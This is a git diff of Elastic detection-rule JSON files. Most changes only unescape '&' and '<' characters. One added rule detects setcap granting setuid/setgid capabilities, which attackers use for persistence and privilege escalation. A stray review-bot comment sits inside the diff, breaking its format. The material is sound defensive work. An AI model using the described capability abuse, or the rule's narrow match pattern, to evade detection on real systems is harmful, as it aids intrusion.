+ "setup": "The 'Audit Directory Service Access' logging policy must be configured for (Success, Failure). Steps to implement the logging policy with Advanced Audit Configuration: ``` Computer Configuration > Policies > Windows Settings > Security Settings > Advanced Audit Policies Configuration > Audit Policies > DS Access > Audit Directory Service Access (Success,Failure) ```",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/f5861570-e39a-4b8a-9259-abd39f84cb97_2.json b/packages/security_detection_engine/kibana/security_rule/f5861570-e39a-4b8a-9259-abd39f84cb97_2.json
index a4bf1330107..884206af633 100644
--- a/packages/security_detection_engine/kibana/security_rule/f5861570-e39a-4b8a-9259-abd39f84cb97_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/f5861570-e39a-4b8a-9259-abd39f84cb97_2.json
@@ -48,7 +48,7 @@
 ],
 "risk_score": 21,
 "rule_id": "f5861570-e39a-4b8a-9259-abd39f84cb97",
- "setup": "The 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Access (Success,Failure)\n```\n",
+ "setup": "The 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Access (Success,Failure)\n```\n",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/f59668de-caa0-4b84-94c1-3a1549e1e798_1.json b/packages/security_detection_engine/kibana/security_rule/f59668de-caa0-4b84-94c1-3a1549e1e798_1.json
index 3a2d33a32b3..84a23b508fb 100644
--- a/packages/security_detection_engine/kibana/security_rule/f59668de-caa0-4b84-94c1-3a1549e1e798_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/f59668de-caa0-4b84-94c1-3a1549e1e798_1.json
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
@@ -70,7 +70,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/f59668de-caa0-4b84-94c1-3a1549e1e798_2.json b/packages/security_detection_engine/kibana/security_rule/f59668de-caa0-4b84-94c1-3a1549e1e798_2.json
index 91023e512ca..3ebf69bdb7a 100644
--- a/packages/security_detection_engine/kibana/security_rule/f59668de-caa0-4b84-94c1-3a1549e1e798_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/f59668de-caa0-4b84-94c1-3a1549e1e798_2.json
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
@@ -77,7 +77,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/f5c005d3-4e17-48b0-9cd7-444d48857f97_1.json b/packages/security_detection_engine/kibana/security_rule/f5c005d3-4e17-48b0-9cd7-444d48857f97_1.json
index 05133b266a7..c41c9f998ae 100644
--- a/packages/security_detection_engine/kibana/security_rule/f5c005d3-4e17-48b0-9cd7-444d48857f97_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/f5c005d3-4e17-48b0-9cd7-444d48857f97_1.json
@@ -57,7 +57,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -66,7 +66,7 @@
 "technique": []
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/f5c005d3-4e17-48b0-9cd7-444d48857f97_2.json b/packages/security_detection_engine/kibana/security_rule/f5c005d3-4e17-48b0-9cd7-444d48857f97_2.json
index 552f176a314..b2e6260b73b 100644
--- a/packages/security_detection_engine/kibana/security_rule/f5c005d3-4e17-48b0-9cd7-444d48857f97_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/f5c005d3-4e17-48b0-9cd7-444d48857f97_2.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -67,7 +67,7 @@
 "technique": []
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/f5c005d3-4e17-48b0-9cd7-444d48857f97_3.json b/packages/security_detection_engine/kibana/security_rule/f5c005d3-4e17-48b0-9cd7-444d48857f97_3.json
new file mode 100644
index 00000000000..8b6a8f0cfaa
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/f5c005d3-4e17-48b0-9cd7-444d48857f97_3.json
@@ -0,0 +1,103 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "This rule monitors for the addition of the cap_setuid+ep or cap_setgid+ep capabilities via setcap. Setuid (Set User ID) and setgid (Set Group ID) are Unix-like OS features that enable processes to run with elevated privileges, based on the file owner or group. Threat actors can exploit these attributes to achieve persistence by creating malicious binaries, allowing them to maintain control over a compromised system with elevated permissions.",
+ "from": "now-9m",
+ "index": [
+ "logs-endpoint.events.*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "Setcap setuid/setgid Capability Set",
+ "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.name == \"setcap\" and process.args : \"cap_set?id+ep\" and not process.parent.name : \"jem\"\n",
+ "related_integrations": [
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.name",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "f5c005d3-4e17-48b0-9cd7-444d48857f97",
+ "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n",
+ "severity": "medium",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Persistence",
+ "Data Source: Elastic Defend"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0003",
+ "name": "Persistence",
+ "reference": "https://attack.mitre.org/tactics/TA0003/"
+ },
+ "technique": []
+ },
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0004",
+ "name": "Privilege Escalation",
+ "reference": "https://attack.mitre.org/tactics/TA0004/"
+ },
+ "technique": [
+ {
+ "id": "T1548",
+ "name": "Abuse Elevation Control Mechanism",
+ "reference": "https://attack.mitre.org/techniques/T1548/",
+ "subtechnique": [
+ {
+ "id": "T1548.001",
+ "name": "Setuid and Setgid",
+ "reference": "https://attack.mitre.org/techniques/T1548/001/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 3
+ },
+ "id": "f5c005d3-4e17-48b0-9cd7-444d48857f97_3",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/f5d9d36d-7c30-4cdb-a856-9f653c13d4e0_1.json b/packages/security_detection_engine/kibana/security_rule/f5d9d36d-7c30-4cdb-a856-9f653c13d4e0_1.json
index 96ac5f36ed3..f460939c8ea 100644
--- a/packages/security_detection_engine/kibana/security_rule/f5d9d36d-7c30-4cdb-a856-9f653c13d4e0_1.json
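Review bot: The `tags` array carries only `"Tactic: Persistence"` while `threat` maps both TA0003 and TA0004, so the tag set and the ATT&CK mapping disagree; add `"Tactic: Privilege Escalation"` to `tags` so filtering by tactic finds this rule under both. The exclusion `not process.parent.name : \"jem\"` in `query` is explained nowhere in the rule — a `false_positives` entry, or one sentence in `setup`, naming what `jem` is and why its setcap invocations are considered benign would stop the next maintainer from removing or widening it blindly. In the `setup` text the agent-policy link is pinned to `/guide/en/fleet/8.10/agent-policy.html` while the neighbouring links use `current`; make the references consistent so that one does not go stale on its own. Finally, `process.args : \"cap_set?id+ep\"` only matches a single capability with exactly the `+ep` flag set, which is narrower than the description's wording suggests, since setcap also accepts comma-joined capability lists and other flag combinations; confirm that this scope is intended and, if not, broaden the pattern or document the limitation.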
+++ b/packages/security_detection_engine/kibana/security_rule/f5d9d36d-7c30-4cdb-a856-9f653c13d4e0_1.json
@@ -36,7 +36,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/f5fb4598-4f10-11ed-bdc3-0242ac120002_2.json b/packages/security_detection_engine/kibana/security_rule/f5fb4598-4f10-11ed-bdc3-0242ac120002_2.json
index 82512519774..4382a33e49a 100644
--- a/packages/security_detection_engine/kibana/security_rule/f5fb4598-4f10-11ed-bdc3-0242ac120002_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/f5fb4598-4f10-11ed-bdc3-0242ac120002_2.json
@@ -47,7 +47,7 @@
 ],
 "risk_score": 47,
 "rule_id": "f5fb4598-4f10-11ed-bdc3-0242ac120002",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/f5fb4598-4f10-11ed-bdc3-0242ac120002_3.json b/packages/security_detection_engine/kibana/security_rule/f5fb4598-4f10-11ed-bdc3-0242ac120002_3.json
index e69cae56b8e..bb95e9a19bb 100644
--- a/packages/security_detection_engine/kibana/security_rule/f5fb4598-4f10-11ed-bdc3-0242ac120002_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/f5fb4598-4f10-11ed-bdc3-0242ac120002_3.json
@@ -47,7 +47,7 @@
 ],
 "risk_score": 47,
 "rule_id": "f5fb4598-4f10-11ed-bdc3-0242ac120002",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/f5fb4598-4f10-11ed-bdc3-0242ac120002_4.json b/packages/security_detection_engine/kibana/security_rule/f5fb4598-4f10-11ed-bdc3-0242ac120002_4.json
index fcc455b50cc..ed372184597 100644
--- a/packages/security_detection_engine/kibana/security_rule/f5fb4598-4f10-11ed-bdc3-0242ac120002_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/f5fb4598-4f10-11ed-bdc3-0242ac120002_4.json
@@ -47,7 +47,7 @@
 ],
 "risk_score": 47,
 "rule_id": "f5fb4598-4f10-11ed-bdc3-0242ac120002",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/f5fb4598-4f10-11ed-bdc3-0242ac120002_5.json b/packages/security_detection_engine/kibana/security_rule/f5fb4598-4f10-11ed-bdc3-0242ac120002_5.json
index 22e13c4c44d..b70e8b47d9f 100644
--- a/packages/security_detection_engine/kibana/security_rule/f5fb4598-4f10-11ed-bdc3-0242ac120002_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/f5fb4598-4f10-11ed-bdc3-0242ac120002_5.json
@@ -46,7 +46,7 @@
 ],
 "risk_score": 47,
 "rule_id": "f5fb4598-4f10-11ed-bdc3-0242ac120002",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/f638a66d-3bbf-46b1-a52c-ef6f39fb6caf_1.json b/packages/security_detection_engine/kibana/security_rule/f638a66d-3bbf-46b1-a52c-ef6f39fb6caf_1.json
index 17381a95105..5b22add0c73 100644
--- a/packages/security_detection_engine/kibana/security_rule/f638a66d-3bbf-46b1-a52c-ef6f39fb6caf_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/f638a66d-3bbf-46b1-a52c-ef6f39fb6caf_1.json
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/f638a66d-3bbf-46b1-a52c-ef6f39fb6caf_2.json b/packages/security_detection_engine/kibana/security_rule/f638a66d-3bbf-46b1-a52c-ef6f39fb6caf_2.json
index a9d7aa719a4..2980adb9800 100644
--- a/packages/security_detection_engine/kibana/security_rule/f638a66d-3bbf-46b1-a52c-ef6f39fb6caf_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/f638a66d-3bbf-46b1-a52c-ef6f39fb6caf_2.json
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_104.json b/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_104.json
index f4836e101b8..56ab19fe845 100644
--- a/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_104.json
@@ -64,7 +64,7 @@
 ],
 "risk_score": 47,
 "rule_id": "f63c8e3c-d396-404f-b2ea-0379d3942d73",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -77,7 +77,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_105.json b/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_105.json
index bcc257e6db0..76663b12230 100644
--- a/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_105.json
@@ -64,7 +64,7 @@
 ],
 "risk_score": 47,
 "rule_id": "f63c8e3c-d396-404f-b2ea-0379d3942d73",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -76,7 +76,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_106.json b/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_106.json
index 4e22a461952..8d396365503 100644
--- a/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_106.json
@@ -64,7 +64,7 @@
 ],
 "risk_score": 47,
 "rule_id": "f63c8e3c-d396-404f-b2ea-0379d3942d73",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -77,7 +77,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_107.json b/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_107.json
index e29d8be6856..686e1b1d2ab 100644
--- a/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_107.json
@@ -64,7 +64,7 @@
 ],
 "risk_score": 47,
 "rule_id": "f63c8e3c-d396-404f-b2ea-0379d3942d73",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -78,7 +78,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -100,7 +100,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_108.json b/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_108.json
index 2a3cc3874a6..38a87137424 100644
--- a/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_108.json
@@ -64,7 +64,7 @@
 ],
 "risk_score": 47,
 "rule_id": "f63c8e3c-d396-404f-b2ea-0379d3942d73",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -78,7 +78,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -100,7 +100,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/f675872f-6d85-40a3-b502-c0d2ef101e92_104.json b/packages/security_detection_engine/kibana/security_rule/f675872f-6d85-40a3-b502-c0d2ef101e92_104.json
index 6f169fb9bda..ce160c5d082 100644
--- a/packages/security_detection_engine/kibana/security_rule/f675872f-6d85-40a3-b502-c0d2ef101e92_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/f675872f-6d85-40a3-b502-c0d2ef101e92_104.json
@@ -55,7 +55,7 @@
 ],
 "risk_score": 21,
 "rule_id": "f675872f-6d85-40a3-b502-c0d2ef101e92",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Elastic",
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/f675872f-6d85-40a3-b502-c0d2ef101e92_105.json b/packages/security_detection_engine/kibana/security_rule/f675872f-6d85-40a3-b502-c0d2ef101e92_105.json
index f65428f8cea..857ad1f2586 100644
--- a/packages/security_detection_engine/kibana/security_rule/f675872f-6d85-40a3-b502-c0d2ef101e92_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/f675872f-6d85-40a3-b502-c0d2ef101e92_105.json
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/f675872f-6d85-40a3-b502-c0d2ef101e92_106.json b/packages/security_detection_engine/kibana/security_rule/f675872f-6d85-40a3-b502-c0d2ef101e92_106.json
index 852b64804ea..ae0d7fe209b 100644
--- a/packages/security_detection_engine/kibana/security_rule/f675872f-6d85-40a3-b502-c0d2ef101e92_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/f675872f-6d85-40a3-b502-c0d2ef101e92_106.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/f675872f-6d85-40a3-b502-c0d2ef101e92_107.json b/packages/security_detection_engine/kibana/security_rule/f675872f-6d85-40a3-b502-c0d2ef101e92_107.json
index 768e27520e1..8db4c16a5e1 100644
--- a/packages/security_detection_engine/kibana/security_rule/f675872f-6d85-40a3-b502-c0d2ef101e92_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/f675872f-6d85-40a3-b502-c0d2ef101e92_107.json
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/f683dcdf-a018-4801-b066-193d4ae6c8e5_102.json b/packages/security_detection_engine/kibana/security_rule/f683dcdf-a018-4801-b066-193d4ae6c8e5_102.json
index 0954c06c7da..053729f9498 100644
--- a/packages/security_detection_engine/kibana/security_rule/f683dcdf-a018-4801-b066-193d4ae6c8e5_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/f683dcdf-a018-4801-b066-193d4ae6c8e5_102.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
